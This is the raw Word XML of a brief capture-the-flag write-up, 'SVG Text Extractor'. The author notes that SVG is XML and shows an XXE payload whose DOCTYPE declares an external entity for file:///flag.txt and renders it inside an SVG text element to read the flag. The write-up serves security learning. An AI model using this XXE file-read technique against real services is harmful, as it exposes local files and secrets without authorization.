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48ED" w14:textId="7E077509" w:rsidR="009A6027" w:rsidRPr="00CD5FFA" w:rsidRDefault="008B7A9E" w:rsidP="00CD5FFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B7A9E">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
        <w:t>SVG Text Extractor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F403B09" w14:textId="28C938A6" w:rsidR="0091376D" w:rsidRDefault="00CD5FFA" w:rsidP="0091376D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5FFA">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">For this challenge, I </w:t>
      </w:r>
      <w:r w:rsidR="0091376D">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
        <w:t>first explored the website a little. I searched up SVG text and obtained the following code:</w:t>
      </w:r>
      <w:r w:rsidR="0091376D">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7707D" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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svg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137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viewBox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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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 0 240 80"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137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xmlns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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"http://www.w3.org/2000/svg"</w:t>
      </w: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F63281A" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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</w:pP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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0091376D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style</w:t>
      </w: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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A064C3B" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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</w:pP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>    .small {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA744A8" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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</w:pP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>      font: italic 13px sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0201B6FA" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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 xml:space="preserve">    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16D55569" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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.heavy {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113A66A8" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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 font: bold 30px sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0880E66B" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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541450DD" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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A6F1EC1" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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/* Note that the color of the text is set with the    *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB9E3F" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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* fill property, the color property is for HTML only */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F278FA" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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</w:pP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>.Rrrrr {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F180175" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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</w:pP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>      font: italic 40px serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCE242" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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val="fr-CA" w:eastAsia="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve">      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fill: red;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80E873" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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726261E2" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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style</w:t>
      </w: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35220B3" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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40BD47C6" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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text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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"20"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"35"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"small"</w:t>
      </w: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My</w:t>
      </w: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137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text</w:t>
      </w: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8773B1D" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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text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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"40"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"35"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"heavy"</w:t>
      </w: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cat</w:t>
      </w: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137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text</w:t>
      </w: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123AC9D" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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text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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"55"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"55"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"small"</w:t>
      </w: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is</w:t>
      </w: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137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text</w:t>
      </w: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0A1DE25" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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text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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"65"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"55"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"Rrrrr"</w:t>
      </w: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Grumpy!</w:t>
      </w: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137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text</w:t>
      </w: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CD42CD9" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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svg</w:t>
      </w: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07461CB" w14:textId="77777777" w:rsidR="0091376D" w:rsidRDefault="0091376D" w:rsidP="0091376D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066AE77B" w14:textId="5015FFC0" w:rsidR="0091376D" w:rsidRDefault="0091376D" w:rsidP="0091376D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
        <w:t>Clearly, SVG files use XML. Therefore, we can try an XXE attack. I changed the above code to be the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6BBEFB" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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9137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137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test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[ </w:t>
      </w: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9137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ENTITY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137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xxe SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"file:///flag.txt"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]</w:t>
      </w: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F8A80EC" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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svg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137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viewBox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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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 0 240 80"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137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xmlns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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"http://www.w3.org/2000/svg"</w:t>
      </w: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F809A20" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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text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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"65"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137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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"55"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137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1376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=</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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"Rrrrr"</w:t>
      </w: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137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&amp;xxe;</w:t>
      </w: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137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text</w:t>
      </w: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3A5A6E6" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="0091376D" w:rsidRDefault="0091376D" w:rsidP="00913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137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svg</w:t>
      </w:r>
      <w:r w:rsidRPr="009137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5FCF130" w14:textId="77777777" w:rsidR="0091376D" w:rsidRPr="00CD5FFA" w:rsidRDefault="0091376D" w:rsidP="0091376D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FC66B8" w14:textId="31678856" w:rsidR="0091376D" w:rsidRPr="00CD5FFA" w:rsidRDefault="0091376D" w:rsidP="00CD5FFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
        <w:t>Through this, I was able to get the flag.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0091376D" w:rsidRPr="00CD5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8A607" w14:textId="77777777" w:rsidR="006D098A" w:rsidRDefault="006D098A" w:rsidP="00CD5FFA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00F4B1E5" w14:textId="77777777" w:rsidR="006D098A" w:rsidRDefault="006D098A" w:rsidP="00CD5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F935C" w14:textId="77777777" w:rsidR="006D098A" w:rsidRDefault="006D098A" w:rsidP="00CD5FFA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="76E8E8BE" w14:textId="77777777" w:rsidR="006D098A" w:rsidRDefault="006D098A" w:rsidP="00CD5F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FA"/>
    <w:rsid w:val="002257DF"/>
    <w:rsid w:val="002C71FC"/>
    <w:rsid w:val="00636FA9"/>
    <w:rsid w:val="006C0D20"/>
    <w:rsid w:val="006D098A"/>
    <w:rsid w:val="008B7A9E"/>
    <w:rsid w:val="0091376D"/>
    <w:rsid w:val="00964385"/>
    <w:rsid w:val="009A6027"/>
    <w:rsid w:val="009F1C87"/>
    <w:rsid w:val="00AC7FC3"/>
    <w:rsid w:val="00C924DA"/>
    <w:rsid w:val="00CD5FFA"/>
    <w:rsid w:val="00E0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609E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6D544CF3-96C4-4464-8B3D-177878DC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FFA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CD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F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FFA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CD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5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Ali</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Areej Ali</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-10T04:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-10T04:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>